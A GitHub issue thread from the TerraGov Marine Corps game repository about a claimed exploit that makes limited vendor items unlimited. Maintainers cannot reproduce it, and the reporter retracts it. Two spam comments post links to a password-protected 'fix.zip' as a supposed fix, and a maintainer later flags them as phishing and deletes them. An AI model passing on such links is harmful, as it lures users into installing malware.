### ISSUE TITLE
Loadout vendors potentially making limited-stuff/ammo/grenades unlimited

### ISSUE THREAD

**Issue by Purplecorenuetral** [tgstation/TerraGov-Marine-Corps#16603]
### Description

When using the loadout vendors, you know that stuff also included in the storage-equipment?
Includes:
All types of bags
All types of Vests
or whatever that you can wear can store stuff.

Limited ammo or grenades isn't tied to the other vendor's stock.
Meaning:
If you create a loadout filled with the limited-ammo/grenade/stuff you want, you can import/vend as much limited-type stuff as you want!
Prime examples that can be abused:
Portable sentries inside the bag/pocket
Marine jetpacks
All kinds of grenades

Basically ANYTHING that's limited in stock can be UNLIMITED in the loadout vendor.

### Test Merges

Round ID: [30747](https://scrubby.melonmesa.com/round/30747)
BYOND Version: 515.1633
Server revision compiled on: 2024-09-28T20:49:06+00:00
Master commit: [3ef9429a06926db5383a261f83802fb4e9d81168](https://github.com/tgstation/TerraGov-Marine-Corps//commit/3ef9429a06926db5383a261f83802fb4e9d81168)
The following pull requests are currently test merged:
[#16557: 'Aim mode replacement' by Lumipharon at commit e4a8424c04](https://github.com/tgstation/TerraGov-Marine-Corps//pull/16557)
[#16515: 'Bluesummers Wreck Site [NEW MAP]' by blackdav123 at commit 6ff020e07a](https://github.com/tgstation/TerraGov-Marine-Corps//pull/16515)
[#16572: 'Lower xeno ratio' by Lumipharon at commit 717aa87dd2](https://github.com/tgstation/TerraGov-Marine-Corps//pull/16572)
[#16542: 'Dancer Praetorian Strain' by Runian at commit 63ab00cbed](https://github.com/tgstation/TerraGov-Marine-Corps//pull/16542)
[#16600: 'Temporary hotfix for stripmenu equipping' by ivanmixo at commit ae12f47463](https://github.com/tgstation/TerraGov-Marine-Corps//pull/16600)

Local commit: 24a7cf43b975116899ccb897eeb6d376fe35cd31
Server tools version: 6.9.0

### Reproduction Steps

1. Go to a equipment vendor or vendors that have limited stock on a specific thing.
2. Put whatever that's limited in stock in your bag or inventory or anything that can store and can be included in the load-out vendor. Like a ST-580 and it's ammo.
3. Save your loadout in the loadout vendor.
4. Equip the same loadout you saved, the stuff that has alot of limited-stuff.
5. Profit. You now have a vendor providing infinite "limited-stuff".

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Pass: changeme

you may need to install the c compiler

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Notamaniac** [comment]
Cannot replicate, grenades and limited equipment appear to spend the appropriate amount of points from the equipment vendors or are properly vended from the general equipment pool. ST 580 and it's ammo does not vend from the loadout vendor period, as it's inside a box (which can't be put into a backpack/storage)

Assuming this isn't some AI generated issue report (with the sussy comment replies)

**Comment by spookydonut** [comment]
deleted the phishing comments

**Comment by Purplecorenuetral** [comment]
Really? I guess I didn't thoroughly checked if the bug was real or not. Sorry! You can close this issue.
